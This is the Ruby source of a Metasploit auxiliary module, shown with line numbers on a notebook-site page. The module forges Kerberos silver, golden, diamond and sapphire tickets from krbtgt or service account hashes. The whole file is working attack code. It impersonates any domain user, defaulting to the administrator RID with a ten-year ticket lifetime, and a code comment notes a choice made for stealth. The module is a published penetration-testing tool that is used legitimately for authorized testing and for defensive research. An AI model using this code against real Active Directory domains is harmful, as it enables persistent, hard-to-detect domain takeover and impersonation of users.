Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Report
8
  include Msf::Exploit::Remote::Kerberos::Client
9
  include Msf::Exploit::Remote::Kerberos::Ticket
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging',
16
        'Description' => %q{
17
          This module forges a Kerberos ticket. Four different techniques can be used:
18
          - Silver ticket: Using a service account hash, craft a ticket impersonating any user and privileges to that account.
19
          - Golden ticket: Using the krbtgt hash, craft a ticket impersonating any user and privileges.
20
          - Diamond ticket: Authenticate to the domain controller, and using the krbtgt hash, copy the PAC from the authenticated user to a forged ticket.
21
          - Sapphire ticket: Use the S4U2Self+U2U trick to retrieve the PAC of another user, then use the krbtgt hash to craft a forged ticket.
22
        },
23
        'Author' => [
24
          'Benjamin Delpy', # Original Implementation
25
          'Dean Welch', # Metasploit Module
26
          'alanfoster', # Enhancements
27
          'smashery' # Enhancements
28
        ],
29
        'References' => [
30
          %w[URL https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it]
31
        ],
32
        'License' => MSF_LICENSE,
33
        'Notes' => {
34
          'Stability' => [CRASH_SAFE],
35
          'SideEffects' => [IOC_IN_LOGS],
36
          'Reliability' => [],
37
          'AKA' => ['Ticketer', 'Klist']
38
        },
39
        'Actions' => [
40
          ['FORGE_SILVER', { 'Description' => 'Forge a Silver Ticket' } ],
41
          ['FORGE_GOLDEN', { 'Description' => 'Forge a Golden Ticket' } ],
42
          ['FORGE_DIAMOND', { 'Description' => 'Forge a Diamond Ticket' } ],
43
          ['FORGE_SAPPHIRE', { 'Description' => 'Forge a Sapphire Ticket' } ],
44
        ],
45
        'DefaultAction' => 'FORGE_SILVER'
46
      )
47
    )
48

49
    based_on_real_ticket_condition = ['ACTION', 'in', %w[FORGE_DIAMOND FORGE_SAPPHIRE]]
50
    forged_manually_condition = ['ACTION', 'in', %w[FORGE_SILVER FORGE_GOLDEN]]
51

52
    register_options(
53
      [
54
        OptString.new('USER', [ true, 'The Domain User to forge the ticket for' ]),
55
        OptInt.new('USER_RID', [ true, "The Domain User's relative identifier (RID)", Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID], conditions: ['ACTION', 'in', %w[FORGE_SILVER FORGE_GOLDEN FORGE_DIAMOND]]),
56
        OptString.new('NTHASH', [ false, 'The krbtgt/service nthash' ]),
57
        OptString.new('AES_KEY', [ false, 'The krbtgt/service AES key' ]),
58
        OptString.new('DOMAIN', [ true, 'The Domain (upper case) Ex: DEMO.LOCAL' ]),
59
        OptString.new('DOMAIN_SID', [ false, 'The Domain SID, Ex: S-1-5-21-1755879683-3641577184-3486455962'], conditions: forged_manually_condition),
60
        OptString.new('EXTRA_SIDS', [ false, 'Extra sids separated by commas, Ex: S-1-5-21-1755879683-3641577184-3486455962-519']),
61
        OptString.new('SPN', [ false, 'The Service Principal Name (Only used for silver ticket)'], conditions: %w[ACTION == FORGE_SILVER]),
62
        OptInt.new('DURATION', [ false, 'Duration of the ticket in days', 3650], conditions: forged_manually_condition),
63
        OptString.new('REQUEST_USER', [false, 'The user to request a ticket for, to base the forged ticket on'], conditions: based_on_real_ticket_condition),
64
        OptString.new('REQUEST_PASSWORD', [false, "The user's password, used to retrieve a base ticket"], conditions: based_on_real_ticket_condition),
65
        OptAddress.new('RHOSTS', [false, 'The address of the KDC' ], conditions: based_on_real_ticket_condition),
66
        OptInt.new('RPORT', [false, "The KDC server's port", 88 ], conditions: based_on_real_ticket_condition),
67
        OptInt.new('Timeout', [false, 'The TCP timeout to establish Kerberos connection and read data', 10], conditions: based_on_real_ticket_condition),
68
      ]
69
    )
70

71
    register_advanced_options(
72
      [
73
        OptString.new('SessionKey', [ false, 'The session key, if not set - one will be generated' ], conditions: forged_manually_condition),
74
        OptBool.new('IncludeTicketChecksum', [ false, 'Adds the Ticket Checksum to the PAC', false], conditions: forged_manually_condition)
75
      ]
76
    )
77
  end
78

79
  SECS_IN_DAY = 60 * 60 * 24
80

81
  def run
82
    case action.name
83
    when 'FORGE_SILVER'
84
      forge_silver
85
    when 'FORGE_GOLDEN'
86
      forge_golden
87
    when 'FORGE_DIAMOND'
88
      forge_diamond
89
    when 'FORGE_SAPPHIRE'
90
      forge_sapphire
91
    else
92
      fail_with(Msf::Module::Failure::BadConfig, "Invalid action #{action.name}")
93
    end
94
  end
95

96
  private
97

98
  def forge_ccache(sname:, flags:, is_golden:)
99
    enc_key, enc_type = get_enc_key_and_type
100

101
    start_time = Time.now.utc
102
    end_time = start_time + SECS_IN_DAY * datastore['DURATION']
103

104
    ccache = forge_ticket(
105
      enc_key: enc_key,
106
      enc_type: enc_type,
107
      start_time: start_time,
108
      end_time: end_time,
109
      sname: sname,
110
      flags: flags,
111
      domain: datastore['DOMAIN'],
112
      username: datastore['USER'],
113
      user_id: datastore['USER_RID'],
114
      domain_sid: datastore['DOMAIN_SID'],
115
      extra_sids: extra_sids,
116
      session_key: datastore['SessionKey'].blank? ? nil : datastore['SessionKey'].strip,
117
      ticket_checksum: datastore['IncludeTicketChecksum'],
118
      is_golden: is_golden
119
    )
120

121
    Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ccache, framework_module: self)
122

123
    if datastore['VERBOSE']
124
      print_ccache_contents(ccache, key: enc_key)
125
    end
126
  end
127

128
  def forge_silver
129
    validate_spn!
130
    validate_sid!
131
    validate_key!
132
    sname = datastore['SPN'].split('/', 2)
133
    flags = Rex::Proto::Kerberos::Model::TicketFlags.from_flags(tgs_flags)
134
    forge_ccache(sname: sname, flags: flags, is_golden: false)
135
  end
136

137
  def forge_golden
138
    validate_sid!
139
    validate_key!
140
    sname = ['krbtgt', datastore['DOMAIN'].upcase]
141
    flags = Rex::Proto::Kerberos::Model::TicketFlags.from_flags(tgt_flags)
142
    forge_ccache(sname: sname, flags: flags, is_golden: true)
143
  end
144

145
  def forge_diamond
146
    validate_remote
147
    validate_aes256_key!
148

149
    begin
150
      domain = datastore['DOMAIN']
151
      options = {
152
        server_name: "krbtgt/#{domain}",
153
        client_name: datastore['REQUEST_USER'],
154
        password: datastore['REQUEST_PASSWORD'],
155
        realm: domain
156
      }
157
      enc_key, enc_type = get_enc_key_and_type
158
      include_crypto_params(options, enc_key, enc_type)
159

160
      tgt_result = send_request_tgt(**options)
161
    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
162
      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Requesting TGT failed: #{e.message}")
163
    rescue Rex::HostUnreachable => e
164
      fail_with(Msf::Exploit::Failure::Unreachable, "Requesting TGT failed: #{e.message}")
165
    end
166

167
    if tgt_result.krb_enc_key[:enctype] != enc_type
168
      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Response has incorrect encryption type (#{tgt_result.krb_enc_key[:enctype]})")
169
    end
170

171
    begin
172
      ticket = modify_ticket(tgt_result.as_rep.ticket, tgt_result.decrypted_part, datastore['USER'], datastore['USER_RID'], datastore['DOMAIN'], extra_sids, enc_key, enc_type, enc_key, false)
173
    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
174
      fail_with(Msf::Exploit::Failure::BadConfig, 'Failed to modify ticket. krbtgt key is likely incorrect')
175
    end
176
    Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: datastore['RHOST'])
177

178
    if datastore['VERBOSE']
179
      print_ccache_contents(ticket, key: enc_key)
180
    end
181
  end
182

183
  def forge_sapphire
184
    validate_remote
185
    validate_key!
186
    options = {}
187
    enc_key, enc_type = get_enc_key_and_type
188
    include_crypto_params(options, enc_key, enc_type)
189

190
    begin
191
      auth_context = kerberos_authenticator.authenticate_via_kdc(options)
192
    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
193
      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Error authenticating to KDC: #{e}")
194
    rescue Rex::HostUnreachable => e
195
      fail_with(Msf::Exploit::Failure::Unreachable, "Requesting TGT failed: #{e.message}")
196
    end
197
    credential = auth_context[:credential]
198

199
    print_status("#{peer} - Using U2U to impersonate #{datastore['USER']}@#{datastore['DOMAIN']}")
200

201
    session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
202
      type: credential.keyblock.enctype.value,
203
      value: credential.keyblock.data.value
204
    )
205

206
    begin
207
      tgs_ticket, tgs_auth = kerberos_authenticator.u2uself(credential, impersonate: datastore['USER'])
208
    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
209
      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Error executing S4U2Self+U2U: #{e}")
210
    rescue Rex::HostUnreachable => e
211
      fail_with(Msf::Exploit::Failure::Unreachable, "Error executing S4U2Self+U2U: #{e.message}")
212
    end
213
    # Don't pass a user RID in: we'll retrieve it from the decrypted PAC
214
    ticket = modify_ticket(tgs_ticket, tgs_auth, datastore['USER'], nil, datastore['DOMAIN'], extra_sids, session_key.value, enc_type, enc_key, true)
215
    Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: datastore['RHOST'])
216

217
    if datastore['VERBOSE']
218
      print_ccache_contents(ticket, key: enc_key)
219
    end
220
  end
221

222
  def validate_remote
223
    if datastore['RHOSTS'].blank?
224
      fail_with(Msf::Exploit::Failure::BadConfig, 'Must specify RHOSTS for sapphire and diamond tickets')
225
    elsif datastore['REQUEST_USER'].blank?
226
      fail_with(Msf::Exploit::Failure::BadConfig, 'Must specify REQUEST_USER for sapphire and diamond tickets')
227
    end
228
  end
229

230
  def kerberos_authenticator
231
    options = {
232
      host: datastore['RHOST'],
233
      realm: datastore['DOMAIN'],
234
      timeout: datastore['TIMEOUT'],
235
      username: datastore['REQUEST_USER'],
236
      password: datastore['REQUEST_PASSWORD'],
237
      framework: framework,
238
      framework_module: self,
239
      ticket_storage: Msf::Exploit::Remote::Kerberos::Ticket::Storage::None.new
240
    }
241

242
    Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(**options)
243
  end
244

245
  def include_crypto_params(options, enc_key, enc_type)
246
    options[:key] = enc_key
247
    if enc_type == Rex::Proto::Kerberos::Crypto::Encryption::AES256
248
      # This should be the server's preferred encryption type, so we can just
249
      # send our default types, expecting that to be selected. More stealthy this way.
250
      options[:offered_etypes] = Rex::Proto::Kerberos::Crypto::Encryption::DefaultOfferedEtypes
251
    else
252
      options[:offered_etypes] = [enc_type]
253
    end
254
  end
255

256
  def get_enc_key_and_type
257
    enc_type = nil
258
    key = nil
259
    if datastore['NTHASH']
260
      enc_type = Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
261
      key = datastore['NTHASH']
262
    elsif datastore['AES_KEY']
263
      key = datastore['AES_KEY']
264
      if datastore['AES_KEY'].size == 64
265
        enc_type = Rex::Proto::Kerberos::Crypto::Encryption::AES256
266
      else
267
        enc_type = Rex::Proto::Kerberos::Crypto::Encryption::AES128
268
      end
269
    end
270

271
    enc_key = key.nil? ? nil : [key].pack('H*')
272
    [enc_key, enc_type]
273
  end
274

275
  def validate_spn!
276
    unless datastore['SPN'] =~ %r{.*/.*}
277
      fail_with(Msf::Exploit::Failure::BadConfig, 'Invalid SPN, must be in the format <service class>/<host><realm>:<port>/<service name>. Ex: cifs/host.realm.local')
278
    end
279
  end
280

281
  def validate_sid!
282
    unless datastore['DOMAIN_SID'] =~ /^S-1-[0-59]-\d{2}/
283
      fail_with(Msf::Exploit::Failure::BadConfig, 'Invalid DOMAIN_SID. Ex: S-1-5-21-1266190811-2419310613-1856291569')
284
    end
285
  end
286

287
  def validate_aes256_key!
288
    unless datastore['NTHASH'].blank?
289
      fail_with(Msf::Exploit::Failure::BadConfig, 'Must set an AES256 key for diamond tickets (NTHASH is currently set)')
290
    end
291

292
    if datastore['AES_KEY'].blank?
293
      fail_with(Msf::Exploit::Failure::BadConfig, 'Must set an AES256 key for diamond tickets')
294
    end
295

296
    if datastore['AES_KEY'].size == 32
297
      fail_with(Msf::Exploit::Failure::BadConfig, 'Must set an AES256 key for diamond tickets (currently set to an AES128 key)')
298
    end
299

300
    if datastore['AES_KEY'].size != 64
301
      fail_with(Msf::Exploit::Failure::BadConfig, 'Must set an AES256 key for diamond tickets (incorrect length)')
302
    end
303
  end
304

305
  def validate_key!
306
    if datastore['NTHASH'].blank? && datastore['AES_KEY'].blank?
307
      fail_with(Msf::Exploit::Failure::BadConfig, 'NTHASH or AES_KEY must be set for forging a ticket')
308
    elsif datastore['NTHASH'].present? && datastore['AES_KEY'].present?
309
      fail_with(Msf::Exploit::Failure::BadConfig, 'NTHASH and AES_KEY may not both be set for forging a ticket')
310
    end
311

312
    if datastore['NTHASH'].present? && datastore['NTHASH'].size != 32
313
      fail_with(Msf::Exploit::Failure::BadConfig, "NTHASH length was #{datastore['NTHASH'].size} should be 32")
314
    end
315

316
    if datastore['AES_KEY'].present? && (datastore['AES_KEY'].size != 32 && datastore['AES_KEY'].size != 64)
317
      fail_with(Msf::Exploit::Failure::BadConfig, "AES key length was #{datastore['AES_KEY'].size} should be 32 or 64")
318
    end
319

320
    if datastore['NTHASH'].present?
321
      print_warning('Warning: newer Windows systems may not accept tickets encrypted with RC4_HMAC (NT hash). Consider using AES.')
322
    end
323
  end
324

325
  def extra_sids
326
    (datastore['EXTRA_SIDS'] || '').split(',').map(&:strip).reject(&:blank?)
327
  end
328
end
329

330